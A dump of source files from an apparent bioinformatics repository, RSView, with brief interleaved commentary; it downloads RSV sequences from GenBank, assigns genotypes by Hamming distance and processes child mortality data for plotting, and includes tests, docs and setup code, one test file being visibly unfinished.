back to full dataframe\n for new_gt in new_gts:\n rsv_df.loc[int(new_gt[0]), 'genotype'] = new_gt[1]\n\n # Make a clean df with relevant columns and save as `.csv`\n clean_df = rsv_df[['collection_date', 'country', 'subtype', 'genotype', \\\n 'G_seq']]\n clean_df.to_csv(outfile)\n\n\nif __name__ == '__main__':\n START_TIME = time.time()\n main()\n END_TIME = time.time()\n print('Finished at {0}. Took {1:.3f} minutes to run.'.format(\n time.asctime(), (END_TIME - START_TIME)/60))\n"
},
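The genotype.py entry above calls genotypes by minimum Hamming distance to one reference sequence per genotype. A minimal, self-contained sketch of that decision rule follows; the reference strings, query, and threshold are invented for illustration and are not real RSV G sequences.

def hamming_distance(seq1, seq2):
    """Return the Hamming distance between equal-length sequences."""
    assert len(seq1) == len(seq2), "Undefined for sequences of unequal length"
    return sum(a != b for a, b in zip(seq1, seq2))

gt_refs = {"GA1": "MSKNKDQRTARTLE", "GB1": "MSRNKDQHTVKTLE"}  # hypothetical references
query = "MSKNKDQRTARTLD"
hd_threshold = 10  # minimum number of sites that must match, as in assign_gt()

gt_hds = {gt: hamming_distance(ref, query) for gt, ref in gt_refs.items()}
# Mirror assign_gt(): call the closest genotype only if enough sites match.
if min(gt_hds.values()) < (len(query) - hd_threshold):
    new_gt = min(gt_hds, key=gt_hds.get)
else:
    new_gt = "NaN"
print(new_gt)  # -> GA1 (distance 1 vs. GA1, 5 vs. GB1)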
{
"alpha_fraction": 0.6284437775611877,
"alphanum_fraction": 0.6437081098556519,
"avg_line_length": 31.7560977935791,
"blob_id": "d136c55ec7bac869dbc93e975da29e8f3f90af2d",
"content_id": "58eeb17cf1f4cb3768a15616076183f0acd025e4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2686,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 82,
"path": "/rsview/health_download.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "\"\"\" This module processes the raw health file and generates full and summary CSVs\nready to be loaded into a dataframe for plotting \"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport country_converter as coco\n\nfrom parsearguments import health_parser\n\n\n\ndef iso3_to_country(iso3):\n \"\"\" Take user input and convert it to the short version of the country name \"\"\"\n\n if iso3 == 'Global':\n return 'Global'\n country = coco.convert(names=iso3, to='name_short')\n return country\n\ndef main(datadir):\n \"\"\" Process raw health CSV and generate full and summary CSVs \"\"\"\n\n # need to change path to this csv\n df_orig = pd.read_csv(str(datadir) + '/health_data_RAW.csv')\n\n # change index to iso3 (3 letter country codes)\n df_orig.columns = df_orig.iloc[3]\n\n # remove spaces from columns names\n df_orig.columns = df_orig.columns.str.strip().str.replace(' ', '')\n\n # for NaN values in iso3, replace with 'Global'\n df_orig['iso3'] = df_orig['iso3'].replace(np.nan, 'Global', regex=True)\n\n # copy original dataframe, excluding blank lines\n df_with_na = df_orig[4:3319].copy()\n df_with_na.index = df_with_na['iso3']\n\n # remove entries with NaN or '-' values\n df_with_na = df_with_na.replace('-', np.nan)\n df_no_na = df_with_na.dropna(axis=0, how='any').fillna(0).copy()\n\n # remove % sign for fneo9, fpost9 and fufive9\n # '18' = 18%\n column_percents = ['fneo9', 'fpost9', 'fufive9']\n for i in column_percents:\n df_no_na[i] = df_no_na[i].str.rstrip('%').astype('float')\n\n\n column_numbers = [\n 'nnd', 'pnd', 'neo9', 'post9', 'ufive9', 'rneo9', 'rpost9', 'rufive9']\n for i in column_numbers:\n df_no_na[i] = df_no_na[i].str.strip().str.replace(',', '')\n\n df_no_na = df_no_na.replace('-', np.nan)\n df_clean = df_no_na.dropna(axis=0, how='any').fillna(0).copy()\n\n for i in column_numbers:\n df_clean[i] = df_clean[i].astype('float')\n\n df_clean.rename(columns={'Country/area name': 'country'}, inplace=True)\n\n # create summary dataframe to groupby iso3 and calculate the mean\n # note: maybe change to median??\n df_summary = df_clean.groupby(df_clean.index).mean().reset_index()\n\n df_summary[\"country_short\"] = [iso3_to_country(x) for x in df_summary.iso3.values]\n df_clean[\"country_short\"] = [iso3_to_country(x) for x in df_clean.iso3.values]\n\n outfile_all = str(datadir) + '/health_data_all.csv'\n outfile_summary = str(datadir) + '/health_data_summary.csv'\n\n # export full and summary dataframes to csv\n df_clean.to_csv(outfile_all)\n df_summary.to_csv(outfile_summary)\n\n\nif __name__ == \"__main__\":\n\n ARGS = health_parser().parse_args()\n\n main(ARGS.datadir)\n"
},
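The iso3_to_country() helper in health_download.py above is a thin wrapper over the country_converter package. A quick sanity check of the conversion it performs (exact short names depend on the installed country_converter version):

import country_converter as coco

for iso3 in ["USA", "KEN", "Global"]:
    # 'Global' is a pseudo-code in the health data, handled before conversion.
    name = "Global" if iso3 == "Global" else coco.convert(names=iso3, to="name_short")
    print(iso3, "->", name)  # e.g. USA -> United States, KEN -> Kenya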
{
"alpha_fraction": 0.5652173757553101,
"alphanum_fraction": 0.582608699798584,
"avg_line_length": 37.33333206176758,
"blob_id": "e7306782876dea03c5674435b0abbb40ebf9c0d1",
"content_id": "cfcafe6872638dc3ee10705cda22a9a9e3dcf90c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 115,
"license_type": "permissive",
"max_line_length": 49,
"num_lines": 3,
"path": "/rsview/_metadata.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "__version__ = '0.dev1'\n__url__ = 'https://github.com/khdusenbury/RSView'\n__author__ = 'Jilliane Bruffey, Kate Dusenbury, and Katie Kistler'\n"
},
{
"alpha_fraction": 0.375,
"alphanum_fraction": 0.375,
"avg_line_length": 13.666666984558105,
"blob_id": "68f3258bb4db11ee6a1fd2a71d91955f1791575d",
"content_id": "10eff6c469b264c41d568e20454141735d47eebf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 88,
"license_type": "permissive",
"max_line_length": 24,
"num_lines": 6,
"path": "/docs/plot_rsv.rst",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "===============\n``plot_rsv.py``\n===============\n\n.. automodule:: plot_rsv\n :members:\n"
},
{
"alpha_fraction": 0.7190684080123901,
"alphanum_fraction": 0.7248908281326294,
"avg_line_length": 39.411766052246094,
"blob_id": "38d77ccc4d378494986161046d6d3bb8d4a61ad6",
"content_id": "69f69d64faa15a33e5b3e381ae2ef6a585ec4ca9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 687,
"license_type": "permissive",
"max_line_length": 225,
"num_lines": 17,
"path": "/docs/Installation.rst",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "============\nInstallation\n============\n\nTo install and run `rsview` perform the following steps:\n\n1. Clone the repo: git clone https://github.com/khdusenbury/RSView.git\n\n2. Create and activate the conda environment in the `environment.yml`:\n * `conda env create -f environment.yml`\n * `source activate rsview`\n\n3. Install `rsview` by running `python setup.py install` within the cloned ``RSView`` directory.\n\n4. Create a plot.ly account [here](https://plot.ly/). Follow [these](https://plot.ly/python/getting-started/#initialization-for-online-plotting) instructions for adding your plot.ly API key to your ~/.plotly/.credentials file\n\nModules can then be run based on user needs.\n"
},
{
"alpha_fraction": 0.5489230155944824,
"alphanum_fraction": 0.5646909475326538,
"avg_line_length": 33.48058319091797,
"blob_id": "e95993593d2f5956a333279b2ee72de1e6d618bf",
"content_id": "a3eeda2dd4af4ebf93bfa0b6ab51820482b9f396",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7103,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 206,
"path": "/rsview/tests/test_genotype.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "\"\"\"Test rsview.genotype.py\n\nMust be run from within `tests` due to file paths.\n\"\"\"\nimport unittest\nimport os\nimport rsview.genotype as genotype\n\n\nSTR = 'MQGHQNCASSG'\nCSVS = ['../data/RSVG_gb_metadata_0-5000.csv',\n '../data/RSVG_gb_metadata_5000-10000.csv']\nCOLUMNS = ['G_seq', 'genotype', 'subtype', 'country', 'collection_date']\n\nTESTDIR = './testdata_genotype'\n\nSEQSDIR = '../data/seqs'\n\nTESTSEQS = [TESTDIR+'/seqs1.fasta', TESTDIR+'/seqs2.fasta',\n TESTDIR+'/seqs3.fasta']\n\nALIGNMENTS = [SEQSDIR+'/G_longtyped_aligned.fasta',\n SEQSDIR+'/G_long_all_aligned.fasta',\n SEQSDIR+'/G_all_aligned.fasta']\n\nGT_A_LIST = ['ON1', 'GA1', 'GA2', 'GA3', 'GA5', 'GA6', 'GA7', 'NA1', 'NA2',\n 'NA3', 'SAA1', 'SAA2']\nGT_B_LIST = ['BA', 'BA2', 'BA4', 'BA5', 'BA7', 'BA8', 'BA9', 'BA10', 'BA11',\n 'BA12', 'BA14', 'THB', 'SAB1', 'SAB3', 'SAB4', 'GB1', 'GB2',\n 'GB3', 'GB4', 'GB13', 'GB12']\n\nclass TestGenotyping(unittest.TestCase):\n \"\"\"\n Tests genotype.py\n \"\"\"\n\n def test_hamming_distance(self):\n \"\"\"Test get correct output and error from genotype.hamming_distance\"\"\"\n str1 = STR\n str2 = str1.replace('Q', 'T')\n self.assertEqual(genotype.hamming_distance(str1, str2),\n str1.count('Q'))\n\n with self.assertRaises(AssertionError):\n genotype.hamming_distance(str1, str1[2:])\n\n\n def test_merge_csvs(self):\n \"\"\"Test genotpe.merge_csvs gives right output df length\"\"\"\n merged_df = genotype.merge_csvs(CSVS)\n self.assertEqual(len(merged_df), 10000)\n\n for column in COLUMNS:\n self.assertTrue(column in list(merged_df))\n\n\n def test_seqstofastas(self):\n \"\"\"Test creation of fasta files.\n\n Test that function can be called.\n\n Test that files are made.\n\n Test those files have expected `.fasta` headings.\n \"\"\"\n # Assumes test_merge_csvs passed\n\n test_df = genotype.merge_csvs(CSVS)\n # Select columns and rid of 'nan', so all G_seqs are strs\n testseqsdf = test_df[['G_seq', 'genotype', 'subtype']].fillna('NaN')\n\n # Ensure some seqs will be \"full length\", so get seqs in all files\n testlength = testseqsdf.G_seq.map(len).max() - 20\n\n with self.assertRaises(AssertionError):\n genotype.seqstofastas(testseqsdf, TESTSEQS[:2], testlength)\n\n # Start with empty TESTDIR then test making expected files\n if os.path.isdir(TESTDIR):\n for seqfile in TESTSEQS:\n if os.path.isfile(seqfile):\n os.remove(seqfile)\n else:\n os.makedirs(TESTDIR)\n\n for seqfasta in TESTSEQS:\n self.assertFalse(os.path.isfile(seqfasta))\n\n genotype.seqstofastas(testseqsdf, TESTSEQS, testlength)\n\n for seqfasta in TESTSEQS:\n self.assertTrue(os.path.isfile(seqfasta))\n with open(seqfasta) as fasta:\n for line in fasta:\n if '>' in line:\n self.assertTrue(line[0] == '>')\n self.assertTrue(3 <= len(line.split(' ')) <= 4)\n self.assertTrue(line.split(' ')[1] in ['A', 'B', 'NaN'])\n\n\n def test_alignseqs(self):\n \"\"\"Test that alignseqs is called and outputs error if improper input.\n\n Not testing alignment by mafft as it is slow and mafft is supported\n elsewhere.\n\n Therefore, I will not test toy data, but will test processed data\n in `../data/seqs/` directory for appropriate headings.\n \"\"\"\n\n with self.assertRaises(AssertionError):\n genotype.alignseqs(TESTSEQS, ALIGNMENTS[:2])\n genotype.alignseqs(TESTSEQS[0], ALIGNMENTS[0])\n\n align_seq = ''\n lenprevseq = 0\n\n # Only run tests on output if such files exist.\n for alignment in ALIGNMENTS:\n if os.path.isfile(alignment):\n with open(alignment) as alignfile:\n for line in alignfile:\n if '>' in line:\n # Test all 
aligned seqs have appropriate headers\n self.assertTrue(line[0] == '>')\n self.assertTrue(3 <= len(line.split(' ')) <= 4)\n self.assertTrue(line.split(' ')[1] in ['A', 'B',\n 'NaN'])\n # Test all aligned seqs have same length\n if lenprevseq != 0:\n self.assertEqual(len(align_seq), lenprevseq)\n if align_seq:\n lenprevseq = len(align_seq)\n align_seq = ''\n else:\n align_seq += line\n\n\n def test_getrefseqs(self):\n \"\"\"Test getting reference sequences yields expected output.\n\n Test on actual alignments from data rather than toy data.\n \"\"\"\n\n # Only run tests on output if such files exist.\n for alignment in ALIGNMENTS:\n self.assertTrue(os.path.isfile(alignment))\n\n gt_list = GT_A_LIST + GT_B_LIST\n\n test_refs = genotype.getrefseqs(ALIGNMENTS[0], ALIGNMENTS[2])\n\n for key in test_refs:\n self.assertTrue(key in gt_list)\n # Empty strings are false. Ensure genotypes have seq.\n self.assertTrue(test_refs[key])\n\n\n\n def test_assign_gt(self):\n \"\"\"Test assigning gneotypes with actual data.\n\n I have not created toy `.fasta` files for testing, so test on real\n data.\n There is a rough check for mistyping in the main code, so just make\n sure output is as expected. Overall, we only check if our genotypes\n are logical and make no claim that they are fully accurate.\n\n Check that if threshold is changed, number of new genotypes and \n mistyped genotypes changes as expected.\n\n This test is slow and takes ~25 seconds to run.\n \"\"\"\n\n self.assertTrue(os.path.isfile(ALIGNMENTS[2]))\n\n alignall = ALIGNMENTS[2]\n\n # Assumes test_getrefseqs passes\n test_refgts = genotype.getrefseqs(ALIGNMENTS[0], ALIGNMENTS[2])\n\n threshold_norm = 150\n threshold_lax = 50\n threshold_strict = 200\n\n assigngt_norm = genotype.assign_gt(alignall, test_refgts,\n threshold_norm)\n self.assertTrue(len(assigngt_norm[2]) == assigngt_norm[1])\n\n assigngt_lax = genotype.assign_gt(alignall, test_refgts,\n threshold_lax)\n self.assertTrue(len(assigngt_lax[2]) == assigngt_lax[1])\n\n assigngt_strict = genotype.assign_gt(alignall, test_refgts,\n threshold_strict)\n self.assertTrue(len(assigngt_strict[2]) == assigngt_strict[1])\n\n self.assertTrue(assigngt_strict[1] < assigngt_norm[1] \\\n < assigngt_lax[1])\n\n self.assertTrue(len(assigngt_strict[0]) < len(assigngt_norm[0]) \\\n < len(assigngt_lax[0]))\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
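As the module docstring above warns, these tests resolve data paths relative to the tests directory, so a typical run is `cd rsview/tests && python -m unittest test_genotype -v`; the ~25-second caveat applies to `test_assign_gt`, which re-genotypes the full alignment at three thresholds.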
{
"alpha_fraction": 0.5564664006233215,
"alphanum_fraction": 0.5622910261154175,
"avg_line_length": 31.875886917114258,
"blob_id": "257feb19d1e5de50f8bd1489652181a080675eee",
"content_id": "20d9cd2422935aeb0f66738f04ef90ae7fa55762",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9271,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 282,
"path": "/rsview/seq_download.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "\"\"\"Download sequences and metadata from GenBank\"\"\"\n\nimport time\nimport re\nimport os\nimport math\nimport pandas as pd\nfrom Bio import Entrez\nimport rsview.parsearguments\n\n\n# Initialize lists for genotype assignment\nGTA_LIST = [r'\\bGA\\s?[0-9]*\\b', r'\\bNA\\s?[0-9]*\\b', r'\\bSAA\\s?[0-9]*\\b',\n\t\t r'\\bON\\s?[0-9]*\\b']\n\nGTB_LIST = [r'\\bGB\\s?[0-9]*\\b', r'\\bSAB\\s?[0-9]*\\b', r'\\bURU\\s?[0-9]*\\b',\n\t\t r'\\bBA\\s?[0-9]*\\b', r'\\bBA\\s?IV\\b', r'\\bTHB\\b']\n\n\ndef getids(database, retmax, term):\n \"\"\"Retrieve genbank sequence IDs matching query term.\n\n Args:\n `database` (str)\n string specifying genbank database to search\n `retmax` (int)\n maximum number of sequence IDs to return\n `term` (str)\n query term\n\n Returns:\n `search_IDs` (list)\n list of sequence IDs returned from the search\n \"\"\"\n search_handle = Entrez.esearch(db=database, retmax=retmax, term=term)\n search_record = Entrez.read(search_handle)\n search_handle.close()\n search_ids = search_record['IdList']\n return search_ids\n\ndef gethandle(database, ids, firstseq, dload_size, rettype, retmode):\n \"\"\"Download Entrez 'handle' for downloading seqs of interest\n \n See `Entrez.efetch` help for additional help.\n\n Args:\n `database` (str)\n Genbank database containing sequences of interest\n `ids` (list)\n sequence IDs returned from `getIDs` or other Entrez search\n `firstseq` (int)\n index of first sequence to download\n `dload_size` (int)\n \tnumber of seqs to download at a time\n `rettype` (str)\n \ttype of file downloaded from GenBank. default: 'gb'\n `retmode` (str)\n \tformat of output from GenBank download. default: `xml`\n\n Returns:\n `handle`\n Entrez object containing sequence information\n \"\"\"\n\n handle = Entrez.efetch(db=database, id=ids, retstart=firstseq,\n \t\tretmax=dload_size, rettype=rettype, retmode=retmode)\n return handle\n\ndef find_subtype(meta_dict):\n \"\"\"Find subtype from dictionary of sequence metadata.\n\n Args:\n `meta_dict` (dict)\n \tdictionary of metadata downloaded from genbank\n\n Returns:\n `subtype` (str)\n \tRSV subtype as one letter string, 'A' or 'B'.\n \"\"\"\n\n subtype = ''\n if ' A' in meta_dict['organism']:\n subtype = 'A'\n elif ' B' in meta_dict['organism']:\n subtype = 'B'\n\n elif subtype == '':\n for val in meta_dict.values():\n if re.search(r'RSV\\s?A\\b', val) or \\\n re.search(r'type: A\\b', val) or \\\n re.search(r'group: A\\b', val) or re.search(r'\\bA\\b', val):\n subtype = 'A'\n elif re.search(r'RSV\\s?B\\b', val) or \\\n re.search(r'type: B\\b', val) or \\\n re.search(r'group: B\\b', val) or re.search(r'\\bB\\b', val):\n subtype = 'B'\n\n return subtype\n\n\ndef find_genotype(meta_dict, genotypes_a, genotypes_b):\n \"\"\"Script for extracting genotype data from genbank metadata.\n\n If the genotype is found, but the subtype is still empty, populate\n subtype data based on genotype.\n\n\n Args:\n `meta_dict` (dict)\n dictionary of metadata\n `genotypes_a` (list)\n list of possible genotypes for subtype A\n `genotypes_b` (list)\n list of possible genotypes for subtype B\n\n Returns:\n `typed_dict` (dict)\n dictionary of metadata with genotype (and missing subtype) data\n filled in.\n \"\"\"\n typed_dict = meta_dict\n genotype = ''\n for value in meta_dict.values():\n if 'genotype:' in value:\n for gtype in genotypes_a:\n if re.search(gtype, value):\n genotype = re.findall(gtype, value)[0]\n if meta_dict['subtype'] == '':\n typed_dict['subtype'] = 'A'\n\n for gtype in genotypes_b:\n if re.search(gtype, value):\n 
genotype = re.findall(gtype, value)[0]\n if meta_dict['subtype'] == '':\n typed_dict['subtype'] = 'B'\n\n typed_dict['genotype'] = genotype\n\n return typed_dict\n\n\ndef makedf(handle):\n \"\"\"\n Convert Genbank sequence data into dataframe containing necessary\n metadata.\n\n Args:\n `handle`\n Entrez object containing information downloaded from GenBank\n\n Returns:\n `seqinfo_df` (DataFrame)\n pandas DataFrame containing downloaded sequence and metadata\n \"\"\"\n records = Entrez.parse(handle)\n seqinfo = []\n for record in records:\n sub_dict = {}\n features = record['GBSeq_feature-table']\n\n #Retrieve metadata\n strain_quals = features[0]['GBFeature_quals']\n for qual in strain_quals:\n qual_dict = dict(qual)\n if 'GBQualifier_value' in qual_dict.keys():\n sub_dict[qual_dict['GBQualifier_name']] = \\\n qual_dict['GBQualifier_value']\n\n #Retrieve G protein sequence\n for feat_dict in features[1:]:\n if 'GBFeature_quals' in feat_dict.keys():\n for feat_qual in feat_dict['GBFeature_quals']:\n if 'GBQualifier_value' in feat_qual.keys():\n if re.search(r'\\bG\\b', feat_qual['GBQualifier_value'])\\\n or re.search(r'\\battachment.*protein\\b',\n feat_qual['GBQualifier_value']):\n g_quals = feat_dict['GBFeature_quals']\n for g_qual in g_quals:\n if g_qual['GBQualifier_name'] == 'translation':\n sub_dict['G_seq'] = g_qual['GBQualifier_value']\n\n sub_dict['subtype'] = find_subtype(sub_dict)\n\n sub_dict = find_genotype(sub_dict, GTA_LIST, GTB_LIST)\n\n seqinfo.append(sub_dict)\n\n handle.close()\n\n seqinfo_df = pd.DataFrame(seqinfo)\n\n return seqinfo_df\n\n\ndef main():\n \"\"\"Download sequence data and return dataframe\"\"\"\n\n parser = rsview.parsearguments.seq_parser()\n args = vars(parser.parse_args())\n prog = parser.prog\n\n print(\"\\nExecuting {0} ({1}) in {2} at {3}.\\n\".format(\n prog, rsview.__version__, os.getcwd(), time.asctime()))\n\n Entrez.email = args['email']\n query = args['query']\n begin = args['firstseq']\n filesize = args['filesize']\n maxseqs = args['maxseqs']\n database = args['db']\n filetype = args['filetype']\n outmode = args['outmode']\n\n if 0 < (filesize - begin) < 100:\n batchsize = filesize - begin\n else:\n batchsize = args['batchsize']\n\n assert maxseqs >= begin, \"Search ends before index of `--firstseq`. 
\"\\\n \"`--maxseqs` ({0}) must be greater than `--firstseq` ({1}).\"\\\n .format(maxseqs, begin)\n\n if not os.path.isdir(args['outdir']):\n os.makedirs(args['outdir'])\n\n maxids = getids(database, maxseqs, query)\n num_all = len(maxids)\n if num_all < maxseqs:\n print('There are {0} IDs that match the query:\\n\\t{1}'.format(\n \t\tnum_all, query))\n elif num_all == maxseqs:\n print('There are at least {0} IDs that match the query:\\n\\t{1}\\n'\\\n '`--maxseqs` may be limiting number of IDs returned.'.format(\n num_all, query))\n\n firstseq = begin # keept track of first seq for print statements\n\n while begin < maxseqs:\n if (begin + filesize) <= maxseqs:\n end = begin + filesize\n else:\n end = maxseqs\n outfile = '{0}/{1}_{2}-{3}.csv'.format(args['outdir'],\n \t\targs['outprefix'], begin, end)\n print('\\nDownloading seq file number {0} of {1}.'.format(\n int(math.ceil((end-firstseq)/filesize)), \n int(math.ceil((num_all-firstseq)/filesize))))\n print('Saving sequences and metadata to: {0}'.format(outfile))\n\n ids = getids(database, end, query)\n numseqs = len(ids)\n\n start = begin\n print('Downloading metadata for seqs: {0} to {1}'.format(start, numseqs))\n\n metadata_frames = []\n while start <= (numseqs - batchsize):\n handle = gethandle(database, ids, start, batchsize, filetype, outmode)\n metadata_df = makedf(handle)\n metadata_frames.append(metadata_df)\n start = start + batchsize\n if (start-begin) % 500 == 0:\n print('Processed {0} seqs'.format(start-begin))\n\n if start != numseqs: #Process final seqs\n handle = gethandle(database, ids, start, numseqs, filetype, outmode)\n metadata_df = makedf(handle)\n metadata_frames.append(metadata_df)\n\n full_df = pd.concat(metadata_frames, ignore_index=True, sort=False)\n assert len(full_df.index) == (numseqs-begin), 'Exported unexpected ' \\\n 'number of seqs. Expected: {0} Retrieved: {1}'.format(\n (numseqs-begin), len(full_df.index))\n full_df.to_csv(outfile)\n\n begin = end\n\nif __name__ == '__main__':\n START_TIME = time.time()\n main()\n END_TIME = time.time()\n print('Program took {0:.3f} minutes to run.'.format((END_TIME - START_TIME)/60))\n"
},
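The subtype/genotype calls in seq_download.py above are plain regex scans over GenBank qualifier values. A self-contained sketch of the same pattern matching on invented metadata dicts (the pattern list is abbreviated from GTA_LIST; the records are hypothetical):

import re

GTA_PATTERNS = [r'\bGA\s?[0-9]*\b', r'\bNA\s?[0-9]*\b']  # abbreviated

records = [  # hypothetical GenBank qualifier dicts
    {'organism': 'Human respiratory syncytial virus A'},
    {'organism': 'Human orthopneumovirus', 'note': 'subtype: A, genotype: NA1'},
]

for rec in records:
    subtype = ''
    if ' A' in rec['organism']:
        subtype = 'A'
    else:  # fall back to scanning all values, as find_subtype() does
        for val in rec.values():
            if re.search(r'type: A\b', val):
                subtype = 'A'
    genotype = ''
    for val in rec.values():
        if 'genotype:' in val:
            for pat in GTA_PATTERNS:
                if re.search(pat, val):
                    genotype = re.findall(pat, val)[0]
    print(subtype, genotype or '(none)')  # -> 'A (none)' then 'A NA1'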
{
"alpha_fraction": 0.42718446254730225,
"alphanum_fraction": 0.42718446254730225,
"avg_line_length": 24.75,
"blob_id": "3c1e019333cbb64feaa9b723ed8868200375ea79",
"content_id": "a2ce6ab3061968b02c3b157163eded60878edab3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 206,
"license_type": "permissive",
"max_line_length": 35,
"num_lines": 8,
"path": "/rsview/__init__.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "\"\"\"\n===================================\nPython API for ``rsview``\n===================================\n\"\"\"\nfrom ._metadata import __version__\nfrom ._metadata import __url__\nfrom ._metadata import __author__\n"
},
{
"alpha_fraction": 0.5977988839149475,
"alphanum_fraction": 0.604302167892456,
"avg_line_length": 35.345455169677734,
"blob_id": "e73fdddfa97675599d485af6c8761f04ae5abc26",
"content_id": "0dbb17f69a67b5d76e8cfe6e56bd2993375ed74e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1999,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 55,
"path": "/setup.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "\"\"\"Setup script for ``rsview``.\"\"\"\n\nimport sys\nfrom os import path\ntry:\n from setuptools import setup, find_packages, Extension\nexcept ImportError:\n from distutils.core import setup, find_packages, Extension\n\n# Check that using Python 3\nif not (sys.version_info[0] == 3):\n raise RuntimeError('rsview requires Python 3.x\\n'\n 'You are using Python {0}.{1}'.format(\n sys.version_info[0], sys.version_info[1]))\n\n# get metadata, which is specified in another file\nmetadata = {}\nwith open('./rsview/_metadata.py') as f:\n lines = [line for line in f.readlines() if not line.isspace()]\nfor dataname in ['version', 'author', 'url']:\n for line in lines:\n entries = line.split('=')\n assert len(entries) == 2, \"Failed to parse metadata:\\n%s\" % line\n if entries[0].strip() == '__%s__' % dataname:\n if dataname in metadata:\n raise ValueError(\"Duplicate metadata for %s\" % dataname)\n else:\n metadata[dataname] = entries[1].strip()[1 : -1]\n assert dataname in metadata, \"Failed to find metadata for %s\" % dataname\n\nwith open('README.md') as f:\n readme = f.read()\n\n# main setup command\nsetup(\n name = 'rsview',\n version = metadata['version'],\n author = metadata['author'],\n url = metadata['url'],\n description = 'Mapping of RSV sequences based on Genbank submissions.' \\\n 'Correlation of genotypes with childhood pneumonia deaths.',\n long_description = readme,\n license = 'MIT License',\n install_requires = ['biopython', 'country_converter', 'plotly', 'pandas'],\n packages=find_packages(exclude=['docs', 'tests']),\n package_dir = {'RSView':'rsview'},\n scripts = ['rsview/seq_download.py',\n 'rsview/genotype.py',\n 'rsview/map_rsv.py',\n 'rsview/health_download.py',\n 'rsview/parsearguments.py',\n 'rsview/plot_rsv.py',\n 'rsview/plot_correlation.py'\n ]\n)\n"
},
{
"alpha_fraction": 0.5667232871055603,
"alphanum_fraction": 0.5692699551582336,
"avg_line_length": 38.797298431396484,
"blob_id": "c21fb825b773a540c180571a661b7428d1ea57b2",
"content_id": "ed40cc4f7c73dc0c14dd19c659db4e4863070bb5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5890,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 148,
"path": "/rsview/tests/test_plot_rsv.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "\"\"\"\nUnittests for map_rsv.py\n\"\"\"\nimport os\nimport unittest\nfrom unittest.mock import patch\n\nimport rsview.plot_rsv as plot_rsv\n\nclass TestPlotRsv(unittest.TestCase):\n \"\"\"\n Tests map_rsv.py\n \"\"\" \n def run_make_df_health_summary(self, datadir):\n \"\"\"\n Run plot_rsv.make_df_health_summary function for testing\n \"\"\"\n rsv_df = plot_rsv.make_df_health_summary(datadir)\n return rsv_df\n\n def run_make_df_health_all(self, datadir):\n \"\"\"\n Run plot_rsv.make_df_health_summary function for testing\n \"\"\"\n rsv_df = plot_rsv.make_df_health_all(datadir)\n return rsv_df\n\n def run input_to_country(self, country_input):\n \"\"\"\n Run plot_rsv.input_to_country function for testing\n \"\"\"\n country = plot_rsv.input_to_country(country_input)\n return country\n\n def run_plot_summary(self, data_type, datadir, highlight_country=None):\n \"\"\"\n Run plot_rsv.plot_summary function for testing\n \"\"\"\n fig = plot_rsv.plot_summary(data_type, datadir, highlight_country)\n return fig\n\n def run_plot_country(self, data_type, datadir, country='Global'):\n \"\"\"\n Run plot_rsv.run_plot_country function for testing\n \"\"\"\n fig = plot_rsv.run_plot_country(data_type, datadir, country)\n return fig\n\n\n\n\n\n\n######## still editing past this point #########\n\n def test_organize_data(self):\n \"\"\"\n Test map_rsv.organize_data function\n \"\"\"\n rsv_df = self.run_organize_data('data')\n\n self.assertEqual(list(rsv_df.columns), ['collection_date', 'country', 'subtype',\n 'genotype', 'year', 'genotype_group'])\n self.assertTrue(len(rsv_df[col].notnull()) == len(rsv_df) for col in rsv_df.columns)\n\n def test_count_types(self):\n \"\"\"\n Test map_rsv.count_types function with different arguments\n \"\"\"\n #Test that health data file exists\n self.assertTrue(os.path.isfile('data'+map_rsv.HEALTHFILE))\n #Test that latitude/longitude data file exists\n self.assertTrue(os.path.isfile('data'+'/country_centroids.csv'))\n\n #Test level='subtype'\n organized_df = self.run_count_types('subtype', 'data')\n\n self.assertEqual(list(organized_df.columns),\n ['country', 'subtype', 'year', 'count', 'country_code', 'Longitude',\n 'Latitude', 'under_five_deaths', 'adj_lon', 'adj_lat'])\n self.assertTrue(len(organized_df[col].notnull()) == len(organized_df) for\n col in organized_df.columns)\n\n #Test level='genotype'\n organized_df = self.run_count_types('genotype', 'data')\n\n self.assertEqual(list(organized_df.columns),\n ['country', 'subtype', 'genotype_group', 'year', 'count', 'country_code',\n 'Longitude', 'Latitude', 'under_five_deaths', 'adj_lon', 'adj_lat'])\n self.assertTrue(len(organized_df[col].notnull()) == len(organized_df) for\n col in organized_df.columns)\n\n #Test level='genotype', genotype_level='all'\n organized_df = self.run_count_types('genotype', 'data', genotype_level='all')\n\n self.assertEqual(list(organized_df.columns),\n ['country', 'subtype', 'genotype', 'year', 'count', 'country_code',\n 'Longitude', 'Latitude', 'under_five_deaths', 'adj_lon', 'adj_lat'])\n self.assertTrue(len(organized_df[col].notnull()) 